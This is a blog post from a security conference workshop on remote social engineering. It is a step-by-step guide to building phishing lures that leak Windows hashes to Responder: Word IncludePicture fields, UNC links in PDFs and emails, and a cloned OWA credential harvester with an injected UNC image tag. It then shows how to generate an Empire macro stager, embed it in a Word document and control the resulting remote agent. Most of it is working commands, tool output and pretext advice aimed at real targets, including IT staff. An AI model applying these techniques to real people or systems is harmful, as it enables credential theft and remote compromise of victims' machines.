Remote SE 101 Workshop

This blog post details the material covered at the Bsides Leeds Remote SE 101 Workshop.

What is Universal Naming Convention (UNC)

UNC is amazing!

Microsoft Windows Universal Naming Convention (UNC) is a method to identify a shared resource or file on a remote computer.

Microsoft Windows uses the following UNC name format: \\servername\sharename\path\filename Microsoft Windows can also allow UNC syntax for WebDAV share access, rather than a URL. This function can be exploited to trick a user into submitting their authentication details without any knowledge of doing so.

01

UNC Word Documents

Create a MSWORD document tweaking the visual appearance as required, examples of ideas that work great during social engineering assignments are CV’s or job information under the pretence of it been sent from a job recruiter.

Click on INSERT / Quick Parts / Insert Field

02

Choose IncludePicture add your UNC link (IP-Address of the SMB listener) under the “Filename or URL” properties field and tick “Data not stored with the document” Click OK.

03

Save the word document at a .docx file.

Next you need to start responder and then you’re ready to send your word document with embedded UNC image request.

Responder

root@kali:~ # responder -I eth0 -wrfv --lm

Directory for responder hashes /usr/share/responder/logs/

Video showing how to do this – UNC Exploit S01E02 Word – Social Engineering

UNC PDF Documents

Create a word document as desired CV look good for this, but this time highlight the word you want a user to click, and right click and select hyperlink.

01

Add your UNC hyperlink file://192.168.56.101/dshdsds

02

Save as PDF

03

Open the PDF and click on it. You will see a warning, good reason for testing!

04

Click Allow, you should see hashes on responder.

05

06

UNC Emails

UNC embed emails are trivial to set up, commonly used as a quick tester to see if a target has correct out bound filters in place, and snag credentials.

Create your email and select which word you would like to add as your UNC hyperlink.

01

Highlight the chosen word and then right click and select ‘Hyperlink’.

02

Leave ‘Text to display:’ the same unless you wish to change it, but under ‘Address:’ add a UNC address file://Your-IP-Address/UNC the directory section (/UNC) does not have to be accessible and can simply be made up.

03

Your email is now ready to test. Send it to your test account, click on the link and you should receive hashes.

Video showing how to do this – UNC Exploit S01E01 Email – Social Engineering

UNC Cloned Website

This is a great attach as it doubles as a standard credential harvester and a UNC embed attack. Simply browsing the site, while using IE combined with weak outbound firewall settings, will result in you collecting hashes.

IT teams will often nose at a site that has been reported as suspicious, snag them creds!

To start with clone your target site, you can do this in any way you like, personally I commonly use a clone of OWA as it works great.

Side note here, but during your recon stage, if you notice the target does not use OWA it’s still a good selection as people believe it as a credible service. A simple email informing people that a new OWA service has been created, works great.

To clone a site using setoolkit

root@kali:~ # setoolkit

Select option ‘1. Social-Engineering Attacks’.

01

Select option ‘2. Website Attack Vectors’.

02

Select option ‘3. Credential Harvester Attack Method’.

03

Select option ‘2. Site Cloner’.

04

Add your IP addresses of your Kali VM.

05

IP address for the POST back in Harvester/Tabnabbing:192.168.0.20

Add the site you wish to clone.

06

SET will ask you if you wish it to start Apache – Select y

[!] Apache may be not running, do you want SET to start the process? [y/n]: y

Your cloned site should not be up and running, you now just need to add the UNC request to the index page.

Location of the index file /var/www/html

07

Right click on the ‘index.html’ file and select ‘Open With Other Application’.

08

Then add your UNC request with your own IP address to the bottom of the index page.

<img src="file:///\\192.168.0.20/test">

10

Responder

root@kali:~ # responder -I eth0 -wrfv --lm

Directory for responder hashes /usr/share/responder/logs/

Browse the index page using IE and you should see hashes.

Video showing how to do this – UNC Exploit S01E03 Web Server – Social Engineering

Empire Macros

Modern phishing attacks commonly contain malicious payloads, which once triggered will grant the remote attacker access to the victim’s internal network.

Windows macros offer an attacker the ability to run local commands on a victim’s machine without the user’s knowledge or consent.

Modern macros commonly rely on PowerShell running shellcode in the systems memory to help bypass restrictions such as antivirus protection.

Once the macro has been triggered the attacker gains remote access to the victims machine. For a malicious payload to execute, initially human participation is required.

To download Empire

git clone https://github.com/EmpireProject/Empire.git

Location of the install script in Empire /root/ Empire/setup/

root@kali:~#./setup/install.sh

Once installed you can start it by running the following

root@kali:~#./empire

The first thing you need to do it set up a local listeners.

(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name Listener1-http
(Empire: listeners/http) > set BindIP 10.0.2.15
(Empire: listeners/http) > execute
[*] Starting listener 'Listener1-http'
[+] Listener successfully started!
(Empire: listeners/http) > back
(Empire: listeners) >

Next you need to create a payload, you use usestager for this requirement.

(Empire: listeners) > usestager (press tab to see all)
multi/bash                osx/applescript           osx/jar                   osx/pkg                   windows/dll               windows/launcher_lnk      windows/macroless_msword 
multi/launcher            osx/application           osx/launcher              osx/safari_launcher       windows/ducky             windows/launcher_sct      windows/teensy           
multi/pyinstaller         osx/ducky                 osx/macho                 osx/teensy                windows/hta               windows/launcher_vbs     
multi/war                 osx/dylib                 osx/macro                 windows/bunny             windows/launcher_bat      windows/macro

To create a Windows macro.

(Empire: listeners) > usestager windows/macro Listener1-http
(Empire: stager/windows/macro) > execute
[*] Stager output written out to: /tmp/macro
(Empire: stager/windows/macro) > back
(Empire: listeners) >

Open your created macro in gedit or any other editor, select all and copy it.

01

You now need to open up Microsoft Word in your Windows VM.

By default the Developer tab in office applications on the ribbon is not enabled, to enable it so you can paste your macro in visual basic you need to go to File / Options / Customize Ribbon – tick developer

02

03

Then click OK. Once back in word, click on the added developer tab on the ribbon, click on Visual Basic.

04

Now right click on ThisDocument / Insert / Module

05

Then paste the copied macro from Empire into the Module1 (code) field.

06

Now using saveas save the document as a Word 97-2003 Document.

07

08

You can now open the macro embedded document to test if it works. Once you click on the Enable Content switch the macro will run.

09

If the macro has worked you should see the connection been received on your Empire listener.

10

Empire call all connected machines agents, you can view all your agents by running the following command.

(Empire: agents) > agents

11

To interact with an agent run the following command changing the agent name to suit as required

(Empire: agents) > interact 953KSCFG

Unless you have used Empire before the first command you should run is help, this will give you a list of available commands to use with your agent.

(Empire: 953KSCFG) > help
Agent Commands
==============
agents            Jump to the agents menu.
back              Go back a menu.
bypassuac         Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>
clear             Clear out agent tasking.
creds             Display/return credentials from the database.
download          Task an agent to download a file.
downloads         Return downloads or kill a download job
exit              Task agent to exit.
help              Displays the help menu or synt

Typical commands such as ipconfig and sysinfo can be used to enumerate the connected machine.

(Empire: 953KSCFG) > ipconfig
Description      : Intel(R) PRO/1000 MT Desktop Adapter
DHCPEnabled      : True
IPAddress        : 192.168.1.9
IPSubnet         : 255.255.255.0
DefaultIPGateway : 192.168.1.1
DNSServer        : 192.168.1.1
DNSHostName      : IE11Win7
Empire: 953KSCFG) > sysinfo
(Empire: 953KSCFG) > sysinfo: 0|http://192.168.1.7:80|IE11WIN7|IEUser|IE11WIN7|192.168.1.9|Microsoft Windows 7 Enterprise |False|powershell|236|powershell|2
Listener:         http://192.168.1.7:80
Internal IP:    192.168.1.9
Username:         IE11WIN7\IEUser
Hostname:       IE11WIN7
OS:               Microsoft Windows 7 Enterprise
High Integrity:   0
Process Name:     powershell
Process ID:       236
Language:         powershell
Language Version: 2

If you make a mess at any point you can reset all of Empire by running the following, note this will delete your DB and will restart as a fresh install.

root@kali:~/Empire/setup# ./reset.sh

@5ub34x and @myexploit2600

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s